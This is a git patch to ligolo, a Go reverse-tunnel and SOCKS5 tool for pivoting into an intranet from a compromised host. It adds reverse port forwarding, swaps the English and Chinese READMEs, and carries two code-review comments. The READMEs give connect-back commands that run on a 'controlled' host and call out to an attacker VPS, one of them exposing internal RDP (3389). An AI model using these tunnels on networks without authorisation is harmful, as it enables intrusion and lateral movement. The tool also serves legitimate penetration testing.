From 620d528233428bd340e6bd279ae63480a4c5899f Mon Sep 17 00:00:00 2001 From: FunnyWolf Date: Thu, 10 Mar 2022 20:12:22 +0800 Subject: [PATCH] add reverse portfwd function --- Makefile | 2 +- README.md | 117 +++++++++++++++++++++++---------------- README_EN.md | 132 ++++++++++++++++++++++++++++++++++++++++++++ README_ZH.md | 118 --------------------------------------- cmd/ligoloc/main.go | 39 +++++++++++-- cmd/ligolos/main.go | 2 +- 6 files changed, 239 insertions(+), 171 deletions(-) create mode 100644 README_EN.md delete mode 100644 README_ZH.md diff --git a/Makefile b/Makefile index a27f4da..7d9610a 100644 --- a/Makefile +++ b/Makefile @@ -9,7 +9,7 @@ CLIENT_BINARY=ligoloc SERVER_BINARY=ligolos TAGS=release -OSARCH = "linux/amd64 linux/386 windows/amd64 windows/386 darwin/amd64 darwin/386" +OSARCH = "linux/amd64 linux/386 windows/amd64 windows/386 darwin/amd64" TLS_HOST ?= 'ligolo.lan' diff --git a/README.md b/README.md index 0a2dd29..ae6e988 100644 --- a/README.md +++ b/README.md 
@@ -1,115 +1,138 @@ -# Ligolo: Reverse tunnel for intranet penetration +# Ligolo : 用于内网渗透的反向隧道 [![forthebadge](https://forthebadge.com/images/badges/made-with-go.svg)](https://forthebadge.com) [![forthebadge](https://forthebadge.com/images/badges/gluten-free.svg)](https://forthebadge.com) -English | [简体中文](./README_ZH.md) +简体中文 | [English](./README_EN.md) -## introduce +## 介绍 -The project is modified according to [ligolo](https://github.com/sysdream/ligolo), mainly for some functional tailoring, which is convenient to use. +项目根据 [ligolo](https://github.com/sysdream/ligolo) 修改,主要做一些功能上的裁剪,方便使用. -**Ligolo** is a simple, lightweight reverse Socks5 proxy tool, all traffic is encrypted with TLS. +**Ligolo** 是一个简单的,轻量级的反向Socks5代理工具及端口映射工具,所有的流量使用TLS加密. -Its function is similar to *Autoroute + Socks4a* in *Meterpreter*, but it is more stable and faster. +其功能类似于*Meterpreter*中的*Autoroute + Socks4a*,但是更加稳定,速度更快. -## why you need this +## 使用场景 -When you have obtained the permission of a Windows / Linux / Mac host on the other party's intranet and the host can connect to the Internet. +当你已经在对方内网获取到一台 Windows / Linux / Mac 主机的权限且该主机可以连接互联网. -At this point you want to establish a Socks5 proxy for the other party's intranet. +此时你想要建立一个对方内网的Socks5代理或需要连接内网某个IP地址的某端口. -**Ligolo** can help you establish an agent to help you continue to penetrate the intranet. +**Ligolo** 可以帮助你建立代理,协助你继续进行内网渗透. -> If the controlled host cannot access the Internet, you can try another tool [pystinger](https://github.com/FunnyWolf/pystinger) +> 如果已控主机不能访问互联网,可以尝试使用另一款工具 [pystinger](https://github.com/FunnyWolf/pystinger) -## Instructions +## 使用方法 -### TL;DR +### Sock5代理 -- Get the compiled binary file [release](https://github.com/FunnyWolf/ligolo/releases) +- 获取已编译的二进制文件 [release](https://github.com/FunnyWolf/ligolo/releases) -- In your VPS hosting. +- 在你的VPS主机中. ``` ./ligolos ``` -- In the controlled intranet host. +- 在已控制的内网主机中. 
``` > ligoloc.exe -s your-vps-ip:443 ``` -- After the connection is successfully established, the 127.0.0.1:1080 of the VPS has established the Socks5 proxy for the internal network of the controlled host. +- 连接建立成功后,此时VPS的127.0.0.1:1080已经建立已控主机的内网Socks5代理. -### Detailed description +### 详细说明 -*Ligolo* contains two modules: +*Ligolo* 包含两个模块: - ligolos (server) - ligoloc (client) -*ligolos* runs on your VPS server (attack server). +*ligolos* 运行于你的VPS服务器 (攻击服务器). -*ligoloc* runs on an already controlled intranet host. +*ligoloc* 运行于已经控制的内网主机. -*ligolos* can use the default settings. It will listen on port 0.0.0.0:443 (for waiting for ligoloc connection) and 127.0.0.1:1080 (for socks5 proxy). +*ligolos*可以使用默认设置.它会监听0.0.0.0:443端口(用于等待ligoloc连接)及127.0.0.1:1080(用于socks5代理). -*ligoloc* The server address must be specified when running, using the parameter `-s your-vps-ip:443`. +*ligoloc*运行时必须制定服务端地址,使用参数`-s your-vps-ip:443`. -You can use the `-h` parameter to view the help. +你可以使用`-h`参数查看帮助. -Once the connection between *ligolos* and *ligoloc* is established, you can use the intranet socks5 proxy of the VPS server `127.0.0.1:1080`. +一旦*ligolos* 和 *ligoloc* 之间的连接建立成功,你即可使用VPS服务器`127.0.0.1:1080`的内网socks5代理. -### Options + +### 反向端口映射 +- 在你的VPS主机中. + +``` +./ligolos -p 0.0.0.0:13389 +``` + +- 在已控制的内网主机中. + +``` +> ligoloc.exe -s your-vps-ip:443 -t 127.0.0.1:3389 +``` + +- 连接建立成功后,已经将以控制内网主机的3389映射到VPS-IP:13389. 
+ + + +### 选项 *ligolos* options: ``` -PS XXX\bin> .\ligolos_windows_amd64.exe -h -Usage of D:\Code\git\go\src\ligolo\bin\ligolos_windows_amd64.exe: +PS D:\xxx\bin> .\ligolos.exe -h +Usage of D:\xxx\ligolos.exe: -cert string The TLS server certificate,Unnecessary (default "cert.pem") -key string The TLS server key,Unnecessary (default "key.pem") -l string The relay server listening address (the connect-back address) (default "0.0.0.0:443") - -s5 string - The local socks5 server address (your proxychains parameter) (default "127.0.0.1:1080") + -p string + The local socks5 server address or ip:port use to connect target (default "127.0.0.1:1080") ``` *ligoloc* options: ``` -PS XXX\bin> .\ligoloc_windows_amd64.exe -h -Usage of D:\Code\git\go\src\ligolo\bin\ligoloc_windows_amd64.exe: +Usage of D:\XXX\ligoloc.exe: + -proxy string + Use proxy to connect ligolo server(e.g. http://user:passwd@192.168.1.128:8080 socks5://user:passwd@192.168.1.128:1080) -s string - The relay server (the connect-back address) (default "example.com:443") + The ligolo server (the connect-back address)(e.g. 0.0.0.0:443) + -t string + The destination server (a 192.168.1.3:3389, 192.168.1.3:22, etc.) - when not specified, Ligolo starts a socks5 proxy server ``` -### Compile +### 编译 -Refer to the compilation method of the original ligolo +参考原版ligolo的编译方法 -## Features +## 特性 -- TLS 1.3 encrypted tunnel -- Multi-platform (Windows / Linux / Mac /...) -- Multiple connection multiplexing (1 TCP connection transmits all traffic) -- SOCKS5 proxy +- TLS 1.3 加密隧道 +- 多平台 (Windows / Linux / Mac / ...) +- 多连接复用 (1 TCP连接传输所有流量) +- SOCKS5代理 ## To Do -- Better timeout mechanism -- SOCKS5 UDP support -- mTLS mutual authentication -- Reverse port mapping (mapping intranet port to internet) +- 更好的超时机制 +- SOCKS5 UDP 支持 +- mTLS双向认证 ## Licensing -GNU General Public License v3.0 (refer to LICENSING). +GNU General Public License v3.0 (参考 LICENSING). 
+ +## 原版作者 + +* Nicolas Chatelain + -## Original author -* Nicolas Chatelain \ No newline at end of file diff --git a/README_EN.md b/README_EN.md new file mode 100644 index 0000000..73e80ec --- /dev/null +++ b/README_EN.md 
@@ -0,0 +1,132 @@ +# Ligolo: Reverse tunnel for intranet penetration + +[![forthebadge](https://forthebadge.com/images/badges/made-with-go.svg)](https://forthebadge.com) +[![forthebadge](https://forthebadge.com/images/badges/gluten-free.svg)](https://forthebadge.com) + +English | [简体中文](./README.md) + +## introduce + +The project is modified according to [ligolo](https://github.com/sysdream/ligolo), mainly for some functional tailoring, which is convenient to use. + +**Ligolo** is a simple, lightweight reverse Socks5 proxy tool, all traffic is encrypted with TLS. + +Its function is similar to *Autoroute + Socks4a* in *Meterpreter*, but it is more stable and faster. + +## why you need this + +When you have obtained the permission of a Windows / Linux / Mac host on the other party's intranet and the host can connect to the Internet. + +At this point you want to establish a Socks5 proxy for the other party's intranet. + +**Ligolo** can help you establish an agent to help you continue to penetrate the intranet. + +> If the controlled host cannot access the Internet, you can try another tool [pystinger](https://github.com/FunnyWolf/pystinger) + +## Instructions + +### TL;DR + +- Get the compiled binary file [release](https://github.com/FunnyWolf/ligolo/releases) + +- In your VPS hosting. + +``` +./ligolos +``` + +- In the controlled intranet host. + +``` +> ligoloc.exe -s your-vps-ip:443 +``` + +- After the connection is successfully established, the 127.0.0.1:1080 of the VPS has established the Socks5 proxy for the internal network of the controlled host. + +### Detailed description + +*Ligolo* contains two modules: + +- ligolos (server) +- ligoloc (client) + +*ligolos* runs on your VPS server (attack server). + +*ligoloc* runs on an already controlled intranet host. + +*ligolos* can use the default settings. It will listen on port 0.0.0.0:443 (for waiting for ligoloc connection) and 127.0.0.1:1080 (for socks5 proxy). 
+ +*ligoloc* The server address must be specified when running, using the parameter `-s your-vps-ip:443`. + +You can use the `-h` parameter to view the help. + +Once the connection between *ligolos* and *ligoloc* is established, you can use the intranet socks5 proxy of the VPS server `127.0.0.1:1080`. + + +### Reverse portfwd +- In your VPS host +``` +./ligolos -p 0.0.0.0:13389 +``` +- In controlled intranet host +``` +> ligoloc. exe -s your-vps-ip:443 -t 127.0.0.1:3389 +``` +- After the connection is established successfully, the intranet host 127.0.0.1:3389 has been mapped to vps-ip:13389 + + +### Options + +*ligolos* options: + +``` +PS D:\xxx\bin> .\ligolos.exe -h +Usage of D:\xxx\ligolos.exe: + -cert string + The TLS server certificate,Unnecessary (default "cert.pem") + -key string + The TLS server key,Unnecessary (default "key.pem") + -l string + The relay server listening address (the connect-back address) (default "0.0.0.0:443") + -p string + The local socks5 server address or ip:port use to connect target (default "127.0.0.1:1080") +``` + +*ligoloc* options: + +``` +Usage of D:\XXX\ligoloc.exe: + -proxy string + Use proxy to connect ligolo server(e.g. http://user:passwd@192.168.1.128:8080 socks5://user:passwd@192.168.1.128:1080) + -s string + The ligolo server (the connect-back address)(e.g. 0.0.0.0:443) + -t string + The destination server (a 192.168.1.3:3389, 192.168.1.3:22, etc.) - when not specified, Ligolo starts a socks5 proxy server +``` + + +### Compile + +Refer to the compilation method of the original ligolo + +## Features + +- TLS 1.3 encrypted tunnel +- Multi-platform (Windows / Linux / Mac /...) +- Multiple connection multiplexing (1 TCP connection transmits all traffic) +- SOCKS5 proxy + +## To Do + +- Better timeout mechanism +- SOCKS5 UDP support +- mTLS mutual authentication +- Reverse port mapping (mapping intranet port to internet) + +## Licensing + +GNU General Public License v3.0 (refer to LICENSING). 
+ +## Original author + +* Nicolas Chatelain \ No newline at end of file diff --git a/README_ZH.md b/README_ZH.md deleted file mode 100644 index a6d9818..0000000 --- a/README_ZH.md +++ /dev/null 
@@ -1,118 +0,0 @@ -# Ligolo : 用于内网渗透的反向隧道 - -[![forthebadge](https://forthebadge.com/images/badges/made-with-go.svg)](https://forthebadge.com) -[![forthebadge](https://forthebadge.com/images/badges/gluten-free.svg)](https://forthebadge.com) - -简体中文 | [English](./README.md) - -## 介绍 - -项目根据 [ligolo](https://github.com/sysdream/ligolo) 修改,主要做一些功能上的裁剪,方便使用. - -**Ligolo** 是一个简单的,轻量级的反向Socks5代理工具,所有的流量使用TLS加密. - -其功能类似于*Meterpreter*中的*Autoroute + Socks4a*,但是更加稳定,速度更快. - -## 使用场景 - -当你已经在对方内网获取到一台 Windows / Linux / Mac 主机的权限且该主机可以连接互联网. - -此时你想要建立一个对方内网的Socks5代理. - -**Ligolo** 可以帮助你建立代理,协助你继续进行内网渗透. - -> 如果已控主机不能访问互联网,可以尝试使用另一款工具 [pystinger](https://github.com/FunnyWolf/pystinger) - -## 使用方法 - -### TL;DR - -- 获取已编译的二进制文件 [release](https://github.com/FunnyWolf/ligolo/releases) - -- 在你的VPS主机中. - -``` -./ligolos -``` - -- 在已控制的内网主机中. - -``` -> ligoloc.exe -s your-vps-ip:443 -``` - -- 连接建立成功后,此时VPS的127.0.0.1:1080已经建立已控主机的内网Socks5代理. - -### 详细说明 - -*Ligolo* 包含两个模块: - -- ligolos (server) -- ligoloc (client) - -*ligolos* 运行于你的VPS服务器 (攻击服务器). - -*ligoloc* 运行于已经控制的内网主机. - -*ligolos*可以使用默认设置.它会监听0.0.0.0:443端口(用于等待ligoloc连接)及127.0.0.1:1080(用于socks5代理). - -*ligoloc*运行时必须制定服务端地址,使用参数`-s your-vps-ip:443`. - -你可以使用`-h`参数查看帮助. - -一旦*ligolos* 和 *ligoloc* 之间的连接建立成功,你即可使用VPS服务器`127.0.0.1:1080`的内网socks5代理. 
- -### 选项 - -*ligolos* options: - -``` -PS XXX\bin> .\ligolos_windows_amd64.exe -h -Usage of D:\Code\git\go\src\ligolo\bin\ligolos_windows_amd64.exe: - -cert string - The TLS server certificate,Unnecessary (default "cert.pem") - -key string - The TLS server key,Unnecessary (default "key.pem") - -l string - The relay server listening address (the connect-back address) (default "0.0.0.0:443") - -s5 string - The local socks5 server address (your proxychains parameter) (default "127.0.0.1:1080") -``` - -*ligoloc* options: - -``` -PS XXX\bin> .\ligoloc_windows_amd64.exe -h -Usage of D:\Code\git\go\src\ligolo\bin\ligoloc_windows_amd64.exe: - -s string - The relay server (the connect-back address) (default "example.com:443") -``` - -### 编译 - -参考原版ligolo的编译方法 - -## 特性 - -- TLS 1.3 加密隧道 -- 多平台 (Windows / Linux / Mac / ...) -- 多连接复用 (1 TCP连接传输所有流量) -- SOCKS5代理 - -## To Do - -- 更好的超时机制 -- SOCKS5 UDP 支持 -- mTLS双向认证 -- 反向端口映射 (映射内网端口到互联网) - -## Licensing - -GNU General Public License v3.0 (参考 LICENSING). - -## 原版作者 - -* Nicolas Chatelain - - - diff --git a/cmd/ligoloc/main.go b/cmd/ligoloc/main.go index 34ca7ad..9b589f7 100644 --- a/cmd/ligoloc/main.go +++ b/cmd/ligoloc/main.go @@ -9,6 +9,7 @@ import ( "github.com/armon/go-socks5" "github.com/hashicorp/yamux" "github.com/sirupsen/logrus" + "io" "net" "net/http" "net/url" 
@@ -95,11 +96,12 @@ func DialTcpBySocks5Proxy(proxyHost string, dstAddr string, auth *ProxyAuth) (c
 }
 
 func main() {
- relayServer := flag.String("s", "", "The ligolo server (the connect-back address)(e.g. example.com:443)")
+ relayServer := flag.String("s", "", "The ligolo server ip:port (e.g. example.com:443)")
+ targetServer := flag.String("t", "", "The destination server ip:port (e.g. 192.168.1.3:3389, 192.168.1.3:22, etc.) - when not specified, Ligolo starts a socks5 proxy server")
 proxyStr := flag.String("proxy", "", "Use proxy to connect ligolo server(e.g. http://user:passwd@192.168.1.128:8080 socks5://user:passwd@192.168.1.128:1080)")
 flag.Parse()
 for {
- err := StartLigolo(*relayServer, *proxyStr)
+ err := StartLigolo(*relayServer, *targetServer, *proxyStr)
 if err != nil {
 logrus.Error(err)
 }
@@ -108,7 +110,7 @@ func main() {
 }
 }
 
-func StartLigolo(relayServer string, proxyStr string) error {
+func StartLigolo(relayServer string, targetServer string, proxyStr string) error {
 var socks *socks5.Server
 logrus.Infoln("Connecting to ligolo server...")
 config := &tls.Config{InsecureSkipVerify: true}
@@ -149,7 +151,16 @@ func StartLigolo(relayServer string, targetServer string, proxyStr string) error {
 }
 logrus.WithFields(logrus.Fields{"active_sessions": session.NumStreams()}).Println("Accepted new connection !")
 // When no targetServer are specified, starts a socks5 proxy
- go socks.ServeConn(stream)
+ if targetServer == "" {
+ go socks.ServeConn(stream)
+ } else {
+ proxyConn, err := net.Dial("tcp", targetServer)
+ if err != nil {
+ logrus.Errorf("Error creating Proxy TCP connection ! Error : %s\n", err)
+ return err
+ }
+ go handleRelay(stream, proxyConn)
+ }
 }
 }
 
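Review bot: In the new `else` branch of the accept loop, a failed `net.Dial` to `targetServer` does `return err`, which exits `StartLigolo` and, through the retry loop in `main` (first hunk), tears down the whole yamux session and every stream multiplexed on it — so one unreachable target port, or presumably any stray connection to the server-side `-p` listener while the target is down, restarts the entire tunnel, and the accepted `stream` is never closed on that path. A per-stream failure should stay per-stream: `logrus.Errorf("Error creating Proxy TCP connection ! Error : %s\n", err)`, `stream.Close()`, `continue`. The `for` loop enclosing this code begins before the hunk and `StartLigolo` continues past it. Note also that the forwarded connection rides the `InsecureSkipVerify: true` TLS config visible as context in the `@@ -108` hunk, so the ligolo server is still not authenticated by the client; a one-line comment next to the new `-t` flag saying so would save users from assuming the port-forward path is mutually authenticated (the README keeps mTLS as a TODO).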
@@ -163,3 +174,23 @@ func startSocksProxy() (*socks5.Server, error) {
 }
 return socks, nil
 }
+
+func handleRelay(src net.Conn, dst net.Conn) {
+ stop := make(chan bool, 2)
+
+ go relay(src, dst, stop)
+ go relay(dst, src, stop)
+
+ select {
+ case <-stop:
+ return
+ }
+}
+
+func relay(src net.Conn, dst net.Conn, stop chan bool) {
+ io.Copy(dst, src)
+ dst.Close()
+ src.Close()
+ stop <- true
+ return
+}
diff --git a/cmd/ligolos/main.go b/cmd/ligolos/main.go
index cc776e4..26d9769 100644
--- a/cmd/ligolos/main.go
+++ b/cmd/ligolos/main.go
@@ -12,7 +12,7 @@ import (
 )
 
 func main() {
- localServer := flag.String("s5", "127.0.0.1:1080", "The local socks5 server address (your proxychains parameter)")
+ localServer := flag.String("p", "127.0.0.1:1080", "The local socks5 server address or ip:port to connect")
 relayServer := flag.String("l", "0.0.0.0:443", "The relay server listening address (the connect-back address)")
 certFile := flag.String("cert", "cert.pem", "The TLS server certificate,Unnecessary")
 keyFile := flag.String("key", "key.pem", "The TLS server key,Unnecessary")
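Review bot: `relay` discards the result of `io.Copy`, so a forward that dies mid-transfer (target RST, yamux stream error) looks exactly like a clean EOF in the logs and cannot be diagnosed; capture it, `if _, err := io.Copy(dst, src); err != nil { logrus.Debugf("relay %s -> %s ended: %s", src.RemoteAddr(), dst.RemoteAddr(), err) }`. Closing both connections as soon as either direction returns can also cut off bytes still being written in the opposite direction; if that matters for the protocols being forwarded, the target-side `*net.TCPConn` supports `CloseWrite()` so the peer can drain before the full close, though the half-close behaviour of the yamux stream is not visible in this hunk and would need checking. Minor style: `select { case <-stop: return }` with a single case is just `<-stop`, and the trailing `return` in `relay` is redundant.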